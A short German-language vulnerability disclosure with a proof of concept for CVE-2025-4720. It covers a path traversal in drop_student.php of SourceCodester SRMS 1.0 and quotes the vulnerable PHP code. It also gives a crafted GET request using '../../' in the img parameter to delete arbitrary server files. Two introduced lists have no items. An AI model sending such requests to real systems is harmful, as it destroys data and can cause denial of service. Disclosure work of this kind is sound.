
Proof-of-concept Exploit für CVE-2025-4720: Path Traversal in SourceCodester SRMS 1.0 ermöglicht beliebiges Löschen von Dateien über einen nicht validierten GET-Parameter.
Im Endpunkt drop_student.php von SourceCodester Student Result Management System (SRMS) 1.0 existiert eine Path-Traversal-Schwachstelle.
Die Anwendung übernimmt benutzergesteuerte Eingaben aus dem GET-Parameter img und übergibt diese ohne Validierung direkt an die Funktion unlink(). Dadurch kann ein Angreifer beliebige Dateien auf dem Server löschen.
$img = $_GET['img'];
if ($img == "DEFAULT") {
} else {
unlink('images/students/' . $img);
}
C:\xampp\htdocs\srms_0\srms\new_test.txt
GET /srms_0/srms/script/admin/core/drop_student.php?id=1&img=../../new_test.txt HTTP/1.1
Host: target
Ein Angreifer kann beliebige Dateien löschen, auf die der Webserver Zugriff hat, darunter:
Dies kann zu Denial-of-Service oder weiteren Angriffen führen.
Diese Schwachstelle stellt einen eigenständigen Angriffsvektor im Vergleich zu zuvor gemeldeten Problemen in SRMS dar, da sie:
SourceCodester
Student Result Management System (SRMS) https://www.sourcecodester.com/srms-makumbusho
1.0
Imad Alvi